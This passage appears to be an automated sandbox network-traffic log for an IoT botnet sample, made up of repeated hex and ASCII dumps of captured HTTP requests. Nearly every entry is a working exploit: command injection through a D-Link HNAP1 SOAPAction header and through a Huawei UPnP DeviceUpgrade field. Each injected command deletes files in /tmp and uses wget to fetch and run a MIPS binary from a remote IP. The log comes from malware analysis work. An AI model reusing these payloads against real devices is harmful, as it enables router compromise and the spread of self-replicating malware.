42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 